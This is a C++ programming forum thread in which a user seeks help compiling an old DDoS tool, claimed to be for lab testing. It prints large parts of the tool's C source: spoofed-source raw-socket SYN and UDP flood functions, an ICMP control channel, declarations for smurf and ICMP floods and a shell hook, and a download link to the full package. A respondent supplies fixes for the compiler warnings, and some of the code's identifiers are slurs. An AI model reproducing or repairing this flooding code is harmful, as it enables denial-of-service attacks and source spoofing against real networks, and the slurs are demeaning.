Updating/Repaiding code for DDoS test la

Forum

Forum
General C++ Programming
Updating/Repaiding code for DDoS test la

Updating/Repaiding code for DDoS test lab

Hello Everyone,

I am working towards setting up a DDoS tool for lab based testing. The tool is based on C++, which I basically have no previous experience with. I am researching into this, but wanted to present it to the community just in case it is something simple that a C++ veteran would easily notice.

The section of code I believe the error derives from is listed below.

/*
 that mess was ripped out of void's code ;)
*/

unsigned long send_seq, ack_seq, srcport;
#define SEQ 0x28374839


void send_tcp_segment(struct ip *ih, struct tcphdr *th, char *data, int dlen) {
  char buf[65536];
  struct {  /* rfc 793 tcp pseudo-header */
    unsigned long saddr, daddr;
    char mbz;
    char ptcl;
    unsigned short tcpl;
  } ph;

  struct sockaddr_in sin;

  ph.saddr=ih->ip_src.s_addr;
  ph.daddr=ih->ip_dst.s_addr;
  ph.mbz=0;
  ph.ptcl=IPPROTO_TCP;
  ph.tcpl=htons(sizeof(*th)+dlen);

  memcpy(buf, &ph, sizeof(ph));
  memcpy(buf+sizeof(ph), th, sizeof(*th));
  memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen);
  memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4);
  th->th_sum=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1);

  memcpy(buf, ih, 4*ih->ip_hl);
  memcpy(buf+4*ih->ip_hl, th, sizeof(*th));
  memcpy(buf+4*ih->ip_hl+sizeof(*th), data, dlen);
  memset(buf+4*ih->ip_hl+sizeof(*th)+dlen, 0, 4);

  ih->ip_sum=ip_sum(buf, (4*ih->ip_hl + sizeof(*th)+ dlen + 1) & ~1);
  memcpy(buf, ih, 4*ih->ip_hl);
  sin.sin_family=AF_INET;
  sin.sin_port=th->th_dport;
  sin.sin_addr.s_addr=ih->ip_dst.s_addr;

  sendto(rawsock, buf, 4*ih->ip_hl + sizeof(*th)+ dlen, 0, (struct sockaddr *)&sin, sizeof(sin));
}

void syn (u_long victim, u_short port, u_short flagg)
{
  int i, s;
  unsigned long my_ip;
  struct ip ih;
  struct tcphdr th;
  struct sockaddr_in sin;
  int sinsize;
  unsigned short myport=6969;
  char buf[1024], b[1024];
  struct timeval tv;

  srandom(time(NULL));
  ih.ip_v=4;
  ih.ip_hl=5;
  ih.ip_tos=0;                  /* XXX is this normal? */
  ih.ip_len=sizeof(ih)+sizeof(th);
  ih.ip_id=htons(random());
  ih.ip_off=0;
  ih.ip_ttl=30;
  ih.ip_p=IPPROTO_TCP;
  ih.ip_sum=0;
  ih.ip_src.s_addr=k00lip();
  ih.ip_dst.s_addr=victim;

  srcport = getrandom(1, 1024)+1000;
  th.th_sport=htons(srcport);

  if (port == 0)
        th.th_dport=htons(getrandom(0, 65535));
  else
        th.th_dport=htons(port);
  th.th_seq=htonl(SEQ);
  th.th_off=sizeof(th)/4;
  th.th_ack=(random());
  th.th_flags = flagg;

  th.th_win=htons(65535);
  th.th_sum=0;
  th.th_urp=(random());

  gettimeofday(&tv, 0);
  send_tcp_segment(&ih, &th, "", 0);
  send_seq = th.th_seq+1+strlen(buf);
}

The error message I am receiving is...

1
2
3

syn.c: In function ‘send_tcp_segment’:
syn.c:30: warning: passing argument 1 of ‘ip_sum’ from incompatible pointer type
syn.c:37: warning: passing argument 1 of ‘ip_sum’ from incompatible pointer type

On another forum from years ago someone suggested "ip_sum should be a function defined in the program". I am really new to C++. How would this be accomplished?

Thanks again for any available assistance.

Last edited on

firedraco (6247)

Use code tags instead of the quotes you are using. Can I see the definition of ip_sum?

IDOsomething (5)

Hello firedraco. Thank you for your assistance with this.

I spoke with a coworker a little while ago who took some C++ classes back in college. He said he is a bit rusty, but he believes the definition is the one below. This however is located in a separate file (tubby.h) than the one noted in the original error message (syn.c).

unsigned short
ip_sum (addr, len)
     u_short *addr;
     int len;

Also, I don't know if it is needed, but the full program can be downloaded from the below URL.

http://packetstormsecurity.org/files/view/24144/stachelantigl.tar.gz

Thanks again for your assistance.

Last edited on

firedraco (6247)

That seems like an old style (K&R C I think?) function declaration. If you are compiling this on a modern C++ compiler (which I hope you are), then you'll need to change it to a C++ function definition:

unsigned short ip_sum(u_short* addr, int len);

IDOsomething (5)

As far as I know I'm using the latest version of gcc. I don't know if it makes a different for compiling, but I am running this on cENTos x64.

1
2

# gcc --version
gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-50)

I commented out the original "unsigned short..." code and applied the one you provided. When running 'make' again the original error still persists. I have included the contents of tubby.h below just in-case you viewing the entire file will be of assistance.

#ifndef TUBBY_H
#define TUBBY_H

//#define __FAVOR_BSD

/*#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>*/

int timiend;


#if CHILDS > 15
#error "Packet kiddie detected..."
#error "That many childs would crash the host... :)"
#endif

#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
#define ANSWER send_connect (ipi->ip_src.s_addr, ID_ACK, answer)

void send_connect (unsigned long, unsigned int, char *);

int returnlocalip();
void syn (u_long victim, u_short port, u_short flagg);
u_short cksum (u_short *, int);
void icmp2(int,int);
int udp (int lamer,int);
int validip (char *);
void icmp (int);
char *strfl (void);
void show_shit (char *);
u_long k00lip (void);
char *k00lntoa (void);
void must_kill_all (void);
void commence_udp (char *);
void commence_nul (char *);
void commence_ack (char *);
void commence_syn (char *);
void commence_icmp (char *);
void commence_smurf (char *);
void delmserver(char *);
void addnewmserver(char *);


#ifdef ID_SHELL
void shellsex (int);
#endif

/*unsigned short
ip_sum (addr, len)
     u_short *addr;
     int len; */

unsigned short ip_sum(u_short* addr, int len);

{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

u_short
cksum (u_short * buf, int nwords)
{

  unsigned long sum;

  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

int
validip (char *ip)
{
  int a, b, c, d, *x;
  sscanf (ip, "%d.%d.%d.%d", &a, &b, &c, &d);
  x = &a;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  x = &b;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  x = &c;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  x = &d;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  sprintf (ip, "%d.%d.%d.%d", a, b, c, d);	// truncate possible garbage data

  return 1;
}

void send_connect (unsigned long to, unsigned int id, char *data)
{
  char buf[1024];
  struct icmp *icmpi = (struct icmp *) buf;
  char *bla = (buf + sizeof (struct icmp));
  struct sockaddr_in sa;
  int i, ssock;
  ssock = socket (AF_INET, SOCK_RAW, 1);

//  bzero (buf, sizeof(buf));
  memset(buf,0,sizeof(buf));

  icmpi->icmp_type = 0;
  icmpi->icmp_hun.ih_idseq.icd_id = htons (id);
 // memcpy(bla,data,sizi);
  strcpy(bla,data);
  icmpi->icmp_cksum = ip_sum ((u_short *) icmpi, 1024);
  sa.sin_family = AF_INET;
  sa.sin_addr.s_addr = to;
  i = sendto (ssock, buf, 1024, 0, (struct sockaddr *) &sa, sizeof (sa));
  close (ssock);
  return;
}



#endif

Thanks again

Last edited on

firedraco (6247)

Ah, since it is a definition you don't want the ';' at the end.

Anyway the problem is that ip_sum takes a u_short* (probably an unsigned short int*, but you'll have to check that), but you are passing it a char* (buf defined on line 10 in the first post's code).

And ugh, that code really needs comments. I hope if you know what it's doing that you'll comment it so the next guy that looks at it can understand it. XD

x = &a;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  x = &b;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  x = &c;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;
  x = &d;
  if (*x < 0)
    return 0;
  if (*x > 255)
    return 0;

This is one of the dumber things I've seen...>_>

IDOsomething (5)

I've been toying with the code and researching since we last spoke and finally have made some progress! I do not know if it is proper formatting, but I changed

char buf[65536];

char buf[65536];

and the make command no longer produces the original error message! Score!!

I am still receiving an error message that was originally received when I first started on this issue. Originally, there were three error messages when I first started working on this (displayed below). Each error message stated "warning: passing argument 1 of ‘ip_sum’ from incompatible pointer type", but to different files. So I assumed that there was probably just one incorrect value that had to be fixed and it would apply to them all. Yes, this is quite the faulty assumption on my part.

stream.h: In function ‘streamitniggah’:
stream.h:79: warning: passing argument 1 of ‘ip_sum’ from incompatible pointer type
stream.h:80: warning: passing argument 1 of ‘ip_sum’ from incompatible pointer type

udp.c: In function ‘udp’:
udp.c:40: warning: passing argument 1 of ‘ip_sum’ from incompatible pointer type

Thankfully, after applying the new definition the error message for stream.h went away. The error message for udp.c sadly still persists. I have included the contents of udp.c below just in case it needs to be reviewed.

int fbi = 1, cia = 9999;

struct udphdr {
        u_short uh_sport;               /* source port */
        u_short uh_dport;               /* destination port */
        short   uh_ulen;                /* udp length */
        u_short uh_sum;                 /* udp checksum */
};

int
udp (int lamer,int sport)
{
  struct
    {
      struct ip ipi;
      struct udphdr udp;
      char evil[1024];
 
   }
  faggot;
  struct sockaddr_in llama;
 
  if (fbi++ > 9999)
    fbi = 1;
  if (cia-- < 1)
    cia = 9999;

  srandom ((time (NULL) + random ()));

  faggot.ipi.ip_hl = 5;
  faggot.ipi.ip_v = 4;
  faggot.ipi.ip_tos = 0x00;
  faggot.ipi.ip_len = htons (sizeof (struct ip) + sizeof(struct udphdr) + udppsize);
  faggot.ipi.ip_id = htons (random ());
  faggot.ipi.ip_off = 0;
  faggot.ipi.ip_ttl = 0xff;
  faggot.ipi.ip_p = IPPROTO_UDP;
  faggot.ipi.ip_src.s_addr = k00lip ();
  faggot.ipi.ip_dst.s_addr = lamer;
  faggot.ipi.ip_sum = ip_sum (&faggot.ipi, sizeof (faggot.ipi));

  faggot.udp.uh_sport = sport;
  faggot.udp.uh_dport = htons (fbi);
  faggot.udp.uh_ulen = htons (sizeof (faggot.udp) + udppsize);

  llama.sin_family = AF_INET;
  llama.sin_addr.s_addr = lamer;

  sendto (rawsock, (void*)&faggot, (sizeof (struct ip) + sizeof(struct udphdr))+udppsize, 0, (struct sockaddr*)&llama,sizeof (llama));

  return 1;
}

Thanks again for any available assistance.

P.S. I do not support the code developers use or questionable terms, but kept them in pace just in case they are referenced in other files.

firedraco (6247)

Lol, I see! Anyway, the issue is that now, you are passing faggot.ipi as a pointer to ip_sum, but &faggot.ipi would be a pointer to the ip struct (which obviously is not the same type as a u_short pointer). It seems to be that they are using a u_short* sort of like a char* so that they can access the struct members directly. It's ugly and non-portable, but I guess the only way you can "fix" it is either rewrite the whole mess or just cast it...

IDOsomething (5)

I just realized that I had a typo in my last reply. I meant to say that I changed the buf deceleration, or whatever it would be called, to...

short buf[65536];

Sadly, I do not have the time or knowledge to rewrite the whole thing. I am researching into type casting now, but feel that I am still a bit behind the learning curve. lol

Last edited on

Topic archived. No new replies allowed.